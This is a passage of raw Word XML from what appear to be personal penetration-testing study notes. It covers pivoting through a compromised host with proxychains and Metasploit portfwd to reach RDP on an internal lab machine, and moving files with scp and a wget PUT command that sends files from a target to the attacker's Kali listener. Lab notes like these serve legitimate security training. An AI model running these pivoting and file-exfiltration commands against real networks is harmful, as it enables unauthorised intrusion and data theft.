        <w:t xml:space="preserve">172.16.5.200 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is the target machine we want to interact with on the 172 network</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t xml:space="preserve">By prepending the command with proxychains, this sends the command to the SOCKS proxy on 127.0.0.1 on port 1080, which gets sent to the compromised machine on 172 subnet, where the command is finally run, so we can access the IP </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">172.16.5.200</w:t>
      </w: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t xml:space="preserve">We successfully used the compromised machine on 172 subnet as our pivot into accessing any machine on the 172 subnet!!</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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_3rk2xflvtaos" w:id="100"/>
      <w:bookmarkEnd w:id="100"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Port forwarding inside of metasploit</w:t>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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In case you are curious, here is how to port forward on Metasploit. This DOES NOT interact with the SOCKS proxy used earlier. But, it does require you to add the route to Metasploit's Route Table, so make sure to do that either using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">route add</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">multi/manage/autoroute</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t xml:space="preserve">This is an alternative to using SOCKS, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">in case you are using a tool that is not SOCKS friendly</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and you just need </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">one port</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to attack, not multiple.</w:t>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t xml:space="preserve">Firstly, go back to the meterpreter session where your compromised machine is, and then run portfwd </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BA7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3187700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="562" name="image560.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image560.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24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BA8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="261"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sessions -i 12</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BA9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="261"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The compromised machine is on meterpreter session 12</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BAA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="261"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">portfwd -h</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t xml:space="preserve">We can create a port forward from localhost port 3389 (PORT FOR </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RDP</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) to port 3389 on the target host (172.16.5.200) as shown in Listing 85.</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4881563" cy="805771"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="540" name="image519.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image519.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId249"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4881563" cy="805771"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="473"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">172.16.5.200</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the target machine that we want to interact with on 172 subnet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BB0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="473"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Port </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3389 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is used for RDP, which is the port we want to connect to on target machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="473"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-l 3389</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Local</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">port (on Kali) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to listen on</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BB2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="473"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-p 3389</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Remote port to</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> connect to on 172.16.5.200</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BB3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="473"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since we didn't specify which ports can access our listener:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="473"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">it implicitly listens on 0.0.0.0:3389, meaning:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BB5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="473"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Any program on your Kali box connecting to 127.0.0.1:3389 will work</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="473"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It would also accept connections to &lt;your-Kali-IP&gt;:3389 from outside (if a firewall doesn’t block it)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BB7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="473"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can specify using</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -L 127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="473"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">portfwd add -L 127.0.0.1 -l 3389 -p 3389 -r 172.16.5.200</w:t>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t xml:space="preserve">Let's test this by connecting to 127.0.0.1:3389 with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">xfreerdp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to access the compromised host in the internal network.</w:t>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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1447800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="514" name="image501.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image501.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId250"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="586"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo xfreerdp /v:127.0.0.1 /u:luiza</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t xml:space="preserve">Using this technique, we can gain a remote desktop session on a host we were otherwise not able to reach from our Kali system. Likewise, if the second target machine was connected to an additional network, we could create a chain of pivots to reach further hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BC0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>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C1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_mzzf34ypnike" w:id="101"/>
      <w:bookmarkEnd w:id="101"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SCP</w:t>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t xml:space="preserve">SCP (Secure Copy Protocol) is a really neat way of getting files between two hosts. Mostly, I use it to get files between my local kali and an SSH session.</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highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">upload-server</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> from </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OSCP-Scripts </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">which is a lot faster to set up, but if that doesn't work then use SCP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BC6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="704"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">upload-server 80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="704"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run this on Kali</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="704"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wget --method=PUT --body-file=&lt;file_path&gt; http://192.168.45.232:80/&lt;outfile&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="704"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run this on SSH</w:t>
      </w:r>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highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">All the scp commands are run from your Kali, never in SSH</w:t>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Getting files from SSH to Local Kali:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BCE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="756"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">With private key for SSH and port 2222:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BCF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="756"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">scp -i id_rsa -P 2222 anita@192.168.216.245:/home/anita/local.txt /home/kali</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BD0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="756"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-i id_rsa </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to specify private key for SSH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="756"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-P 2222</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for custom port to connect to SSH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BD2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="756"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">With password for SSH and port 22 (default):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="756"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">scp bob@192.168.1.50:/home/bob/secret.txt /home/kali/Desktop/</w:t>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Getting files from Local Kali to SSH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BD8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="341"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
